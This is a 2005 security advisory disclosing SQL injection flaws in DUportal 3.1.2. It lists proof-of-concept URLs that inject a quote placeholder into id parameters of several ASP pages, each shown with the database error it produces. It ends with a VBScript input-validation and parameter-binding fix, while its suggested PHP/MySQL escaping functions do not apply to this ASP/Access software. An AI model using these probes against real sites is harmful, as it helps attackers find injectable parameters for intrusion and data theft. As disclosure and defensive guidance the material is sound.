HSC Research Group - Advisories
Written by Hackers Center
Wednesday, 20 April 2005 16:43
Dcrab's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: Very High
Title: DUportal 3.1.2 and DUportal 3.1.2 SQL have many SQL injection vulnerabilities.
Date: 20/04/2005
Vendor: DUware
Vendor Website: http://www.duware.com
Summary: There are many SQL injections in DUportal 3.1.2 and DUportal 3.1.2 SQL.
Proof of Concept Exploits:

http://localhost/test_DUportal/home/../home/channel.asp?iChannel='SQL_INJECTION&nChannel=Articles  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_CHANNEL = CHA_ID AND CAT_CHANNEL = ''SQL_INJECTION'.
/test_DUportal/includes/inc_channel.asp, line 44

http://localhost/test_DUportal/home/detail.asp?iData='SQL_INJECTION&iCat=221&iChannel=7&nChannel=Ads  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'DAT_ID = ''SQL_INJECTION'.
/test_DUportal/includes/inc_detail.asp, line 39

http://localhost/test_DUportal/home/detail.asp?iData=136&iCat='SQL_INJECTION&iChannel=7&nChannel=Ads  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_CHANNEL = CHA_ID AND DAT_CATEGORY = CAT_ID AND CHA_ACTIVE = 1 AND DAT_CATEGORY = ''SQL_INJECTION AND DAT_ID <> 136 AND DAT_APPROVED=1 AND DAT_EXPIRED > DATE()'.
/test_DUportal/includes/inc_detail_related.asp, line 44

http://localhost/test_DUportal/includes/inc_poll_voting.asp?DAT_PARENT='SQL_INJECTION&DAT_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&DAT_ID=112  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DAT_ID = 'SQL_INJECTION'.
/test_DUportal/includes/inc_poll_voting.asp, line 47

http://localhost/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData='SQL_INJECTION&nChannel=Products&iRate=5  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'DAT_ID = ''SQL_INJECTION'.
/test_DUportal/includes/inc_rating.asp, line 47

http://localhost/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData=86&nChannel=Products&iRate='SQL_INJECTION  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'DAT_RATED + ''SQL_INJECTION'.
/test_DUportal/includes/inc_rating.asp, line 47

http://localhost/test_DUportal/home/detail.asp?iData=86&iCat='SQL_INJECTION&iChannel=8&nChannel=Products  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_CHANNEL = CHA_ID AND DAT_CATEGORY = CAT_ID AND CHA_ACTIVE = 1 AND DAT_CATEGORY = ''SQL_INJECTION AND DAT_ID <> 86 AND DAT_APPROVED=1 AND DAT_EXPIRED > DATE()'.
/test_DUportal/includes/inc_detail_related.asp, line 44

http://localhost/test_DUportal/home/channel.asp?iChannel='SQL_INJECTION  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_CHANNEL = CHA_ID AND CAT_CHANNEL = ''SQL_INJECTION'.
/test_DUportal/includes/inc_channel.asp, line 44

http://localhost/test_DUportal/home/detail.asp?iData='SQL_INJECTION&iCat=248&iChannel=6&nChannel=Events  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'DAT_ID = ''SQL_INJECTION'.
/test_DUportal/includes/inc_detail.asp, line 39

http://localhost/test_DUportal/home/detail.asp?iData=10&iCat='SQL_INJECTION&iChannel=1&nChannel=News  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_CHANNEL = CHA_ID AND DAT_CATEGORY = CAT_ID AND CHA_ACTIVE = 1 AND DAT_CATEGORY = ''SQL_INJECTION AND DAT_ID <> 10 AND DAT_APPROVED=1 AND DAT_EXPIRED > DATE()'.
/test_DUportal/includes/inc_detail_related.asp, line 44

http://localhost/test_DUportal/home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'DAT_CATEGORY = CAT_ID AND CHA_ID = CAT_CHANNEL AND CHA_ID = 'SQL_INJECTION AND (DAT_NAME LIKE '%dcrab%' OR DAT_DESCRIPTION LIKE '%dcrab%') AND DAT_APPROVED = 1 AND CHA_ACTIVE=1 AND DAT_EXPIRED > DATE() AND DAT_PARENT=0 ORDER BY CHA_MENU, CAT_NAME, DAT_NAME'.
/test_DUportal/includes/inc_result.asp, line 53

http://localhost/test_DUportal/home/type.asp?iCat='SQL_INJECTION&iChannel=8&nChannel=Products  SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'DAT_CATEGORY = CAT_ID AND CAT_CHANNEL = CHA_ID AND DAT_APPROVED=1 AND CHA_ACTIVE=1 AND DAT_EXPIRED > DATE() AND DAT_CATEGORY = ''SQL_INJECTION'.
/test_DUportal/includes/inc_type.asp, line 41
Possible Fixes: The usage of mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the MySQL database would solve these problems.
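The error output above comes from classic ASP pages (inc_detail.asp, inc_rating.asp, inc_channel.asp and the rest) querying a Microsoft Access database through ODBC, an environment in which the PHP/MySQL escaping functions are not available. As an added illustration, not DUportal's code, the following shows what the same defensive idea looks like there: every id parameter named in the advisory (iChannel, iCat, iData, iRate, DAT_PARENT) is rejected unless it is a plain integer, and the value is then bound through an ADODB.Command parameter instead of being concatenated into the query text. The table name tblData, the helper names ParseId and GetDetailRecord, and the connection variable objConn are assumptions.

```vbscript
<%
' Added example, not DUportal code. The error messages in the advisory show
' request parameters being pasted straight into the SQL text of classic ASP
' pages backed by Access/ODBC. tblData, ParseId, GetDetailRecord and objConn
' are assumed names; the column names come from the advisory's error output.
Option Explicit

' ADO constants (normally supplied by adovbs.inc)
Const adInteger    = 3
Const adParamInput = 1
Const adCmdText    = 1

' --- Vulnerable pattern, as implied by the error text -------------------
' sql = "SELECT * FROM tblData WHERE DAT_ID = " & Request.QueryString("iData")
' Set rs = objConn.Execute(sql)
' Anything that is not a number becomes part of the query, which is exactly
' the "Syntax error ... 'DAT_ID = ''SQL_INJECTION'" reported above.

' --- Fix 1: type-check the input before it gets anywhere near SQL ---------
' Returns the parameter as a Long, or -1 if it is not a plain positive
' integer. A digit-only loop is used on purpose: IsNumeric() also accepts
' forms such as "1e3", "&H1F" and "1,000", which are not valid ids here.
Function ParseId(raw)
    Dim i
    ParseId = -1
    If Len(raw) = 0 Or Len(raw) > 9 Then Exit Function
    For i = 1 To Len(raw)
        If InStr("0123456789", Mid(raw, i, 1)) = 0 Then Exit Function
    Next
    ParseId = CLng(raw)
End Function

' --- Fix 2: bind the value as a parameter, never as query text -----------
' The query text is constant; the id travels to the driver as typed data,
' so a quote character in it can never change the statement's structure.
Function GetDetailRecord(conn, dataId)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT * FROM tblData WHERE DAT_ID = ? AND DAT_APPROVED = 1"
    cmd.Parameters.Append cmd.CreateParameter("pDatId", adInteger, adParamInput, 4, dataId)
    Set GetDetailRecord = cmd.Execute
End Function

' --- Page logic: reject bad ids with a 400 instead of a database error ----
Dim iData, rs
iData = ParseId(Request.QueryString("iData"))
If iData < 0 Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid request."
    Response.End
End If

Set rs = GetDetailRecord(objConn, iData)   ' objConn: the page's open ADODB.Connection (assumed)
%>
```

Because every parameter listed in the advisory is an integer id, the type check alone already keeps the quote character out of the query; parameter binding is what additionally protects string-valued inputs such as the keyword passed to search.asp. Separately, the file path and line number in the error text reach the browser only because detailed ASP error messages are being sent to the client; disabling that in the IIS application settings removes the feedback the proof-of-concept requests depend on, but it does not fix the injection itself.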
Keep yourself updated; RSS feed at: http://digitalparadox.org/rss.ah
Author: These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my upcoming book on secure coding with PHP.